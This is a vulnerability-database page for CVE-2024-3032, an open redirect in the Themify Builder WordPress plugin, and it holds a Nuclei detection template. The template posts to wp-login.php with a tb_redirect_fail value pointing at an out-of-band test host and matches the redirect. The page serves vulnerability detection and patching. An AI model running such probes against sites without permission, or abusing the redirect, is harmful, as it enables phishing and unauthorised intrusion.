Lucene search
K

WordPress Themify Builder < 7.5.8 - Open Redirect

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Themify Builder plugin < 7.5.8 has a medium severity open redirect vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-3032
19 Mar 202521:02
circl
CNNVD
WordPress plugin Themify Builder security vulnerability
13 Jun 202400:00
cnnvd
CVE
CVE-2024-3032
13 Jun 202406:00
cve
Cvelist
CVE-2024-3032 Themify Builder < 7.5.8 - Open Redirect
13 Jun 202406:00
cvelist
EUVD
EUVD-2024-31640
3 Oct 202520:07
euvd
NVD
CVE-2024-3032
13 Jun 202406:15
nvd
OSV
CVE-2024-3032
13 Jun 202406:15
osv
Patchstack
WordPress Themify Builder plugin < 7.5.8 - Open Redirect vulnerability
13 Jun 202409:41
patchstack
Patchstack
WordPress Themify Builder Plugin < 7.5.8 is vulnerable to Open Redirection
13 Jun 202400:00
patchstack
RedhatCVE
CVE-2024-3032
23 May 202509:21
redhatcve
Rows per page
id: CVE-2024-3032

info:
  name: WordPress Themify Builder < 7.5.8 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    The Themify Builder WordPress plugin before version 7.5.8 contains an open redirect vulnerability. The plugin does not validate the tb_redirect_fail parameter before redirecting users to its value, which could allow attackers to redirect users to malicious websites.
  impact: |
    Attackers can redirect users to malicious websites, potentially leading to phishing attacks or credential theft.
  remediation: |
    Update Themify Builder to version 7.5.8 or later.
  reference:
    - https://wpscan.com/vulnerability/d130a60c-c36b-4994-9b0e-e52cd7f99387
    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-3032
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-3032
    cwe-id: CWE-601
    epss-score: 0.00823
    epss-percentile: 0.52827
    cpe: cpe:2.3:a:themify:builder:*:*:*:*:-:wordpress:*:*
  metadata:
    max-request: 2
    vendor: themify
    product: builder
    fofa-query: body="wp-content/plugins/themify-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,redirect,themify-builder,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "themify-builder"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: http://oast.me

        log={{username}}&pwd={{password}}&tb_login=1&tb_redirect_fail=https://oast.me

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302

      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4b0a00483046022100d11e003a01769cd92792b9a97a7fa2e147b7d6c1fd0050137c77368f06435024022100b539e90f51a95fe81247754ca30f08ac5778640bf34d47c8a830f2e23a6dae86:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.1
EPSS0.00823
SSVC
16